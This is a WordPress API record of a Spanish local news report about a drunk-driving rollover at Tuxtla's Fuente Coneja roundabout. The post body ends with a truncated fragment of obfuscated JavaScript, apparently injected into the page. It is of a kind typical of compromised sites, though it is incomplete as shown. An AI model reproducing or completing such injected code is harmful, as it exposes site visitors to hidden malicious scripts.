{"id":12579,"date":"2023-11-13T02:39:48","date_gmt":"2023-11-13T02:39:48","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=12579"},"modified":"2023-11-13T02:39:48","modified_gmt":"2023-11-13T02:39:48","slug":"se-registra-una-volcadura-en-la-rotonda-de-la-fuente-coneja","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=12579","title":{"rendered":"Se registra una volcadura en la rotonda de la Fuente Coneja"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/WhatsApp-Image-2023-11-12-at-5.56.18-PM-1-1024x576.jpeg\" alt=\"\" class=\"wp-image-12581\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/WhatsApp-Image-2023-11-12-at-5.56.18-PM-1-1024x576.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/WhatsApp-Image-2023-11-12-at-5.56.18-PM-1-300x169.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/WhatsApp-Image-2023-11-12-at-5.56.18-PM-1-768x432.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/WhatsApp-Image-2023-11-12-at-5.56.18-PM-1-1536x864.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/WhatsApp-Image-2023-11-12-at-5.56.18-PM-1.jpeg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 12 de noviembre del 2023. Tuxtla Guti\u00e9rrez. &#8211; Este domingo por la tarde, se registr\u00f3 una volcadura en la zona Poniente Norte de Tuxtla, a la altura de la rotonda de la Fuente Coneja.<\/p>\n\n\n\n<p>De <a><\/a>acuerdo con los reportes, oficiales este hecho ocurri\u00f3 cerca de las 5 de la tarde cuando, un Mazda de color gris que circulaba en el carril de Poniente a Oriente y al ir a exceso de velocidad y salir de la curva de la rotonda choc\u00f3 contra el camell\u00f3n y sali\u00f3 disparado.<\/p>\n\n\n\n<p>Esto ocasion\u00f3 que, el auto girara 180 grados y volc\u00f3 y se desplaz\u00f3 m\u00e1s de 30 metros.<\/p>\n\n\n\n<p>Al lugar arribaron param\u00e9dicos de Protecci\u00f3n Civil Municipal quienes tras una revisi\u00f3n, determinaron que el conductor circulaba en estado inconveniente.<\/p>\n\n\n\n<p>El sujeto fue determinaron y subido a una patrulla.<\/p>\n\n\n\n<p>La unidad fue trasladada a un corral\u00f3n en turno.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.facebook.com\/photo\/?fbid=752111503628013&amp;set=pcb.752111610294669&amp;__cft__[0]=AZXzYtd8YsD-jgvzFVMwYChDxQvWLWkUBlPCxIcAumBPs_ySMiMzHS7_qraOGGs1b6b89CS3Oq1AeMos3jTBFC93Umw-9fAlPaE_PXsqfYfU4O5TGG-zHJXEUAPwhwRbKWvSvOydMA_si_Ik0UZoIPHiRd2vpmicohORJL0rHisIwjqBvurIikcOwfRkJYRTF-4&amp;__tn__=*bH-R\"><\/a><\/p>\n\n\n\n<p><a href=\"https:\/\/www.facebook.com\/photo\/?fbid=752111533628010&amp;set=pcb.752111610294669&amp;__cft__[0]=AZXzYtd8YsD-jgvzFVMwYChDxQvWLWkUBlPCxIcAumBPs_ySMiMzHS7_qraOGGs1b6b89CS3Oq1AeMos3jTBFC93Umw-9fAlPaE_PXsqfYfU4O5TGG-zHJXEUAPwhwRbKWvSvOydMA_si_Ik0UZoIPHiRd2vpmicohORJL0rHisIwjqBvurIikcOwfRkJYRTF-4&amp;__tn__=*bH-R\"><\/a><\/p>\n\n\n\n<p><a href=\"https:\/\/www.facebook.com\/photo\/?fbid=752111583628005&amp;set=pcb.752111610294669&amp;__cft__[0]=AZXzYtd8YsD-jgvzFVMwYChDxQvWLWkUBlPCxIcAumBPs_ySMiMzHS7_qraOGGs1b6b89CS3Oq1AeMos3jTBFC93Umw-9fAlPaE_PXsqfYfU4O5TGG-zHJXEUAPwhwRbKWvSvOydMA_si_Ik0UZoIPHiRd2vpmicohORJL0rHisIwjqBvurIikcOwfRkJYRTF-4&amp;__tn__=*bH-R\"><\/a><\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.facebook.com\/photo\/?fbid=752111583628005&amp;set=pcb.752111610294669&amp;__cft__[0]=AZXzYtd8YsD-jgvzFVMwYChDxQvWLWkUBlPCxIcAumBPs_ySMiMzHS7_qraOGGs1b6b89CS3Oq1AeMos3jTBFC93Umw-9fAlPaE_PXsqfYfU4O5TGG-zHJXEUAPwhwRbKWvSvOydMA_si_Ik0UZoIPHiRd2vpmicohORJL0rHisIwjqBvurIikcOwfRkJYRTF-4&amp;__tn__=*bH-R\"><img decoding=\"async\" src=\"https:\/\/scontent.fmex20-1.fna.fbcdn.net\/v\/t39.30808-6\/401136558_752111673627996_7550590978289710353_n.jpg?stp=dst-jpg_s600x600&amp;_nc_cat=111&amp;ccb=1-7&amp;_nc_sid=5f2048&amp;_nc_ohc=eJ4VvaiwReoAX--s3f9&amp;_nc_ht=scontent.fmex20-1.fna&amp;oh=00_AfAw7KI7zFhypUMA4pGFyHbb8odqO8qFH5wx43e7gOx80w&amp;oe=65563464\" alt=\"\"\/><\/a><\/figure>\n\n\n\n\n\n\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 12 de noviembre del 2023. Tuxtla Guti\u00e9rrez. &#8211; Este domingo por la tarde, se registr\u00f3 una volcadura en la zona Poniente Norte de Tuxtla, a la altura de la rotonda de la Fuente Coneja. De acuerdo con los reportes, oficiales este hecho ocurri\u00f3 cerca de las 5 de la tarde cuando, &hellip;<\/p>\n","protected":false},"author":2,"featured_media":12580,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-12579","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/12579","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=12579"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/12579\/revisions"}],"predecessor-version":[{"id":12582,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/12579\/revisions\/12582"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/12580"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=12579"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=12579"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=12579"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}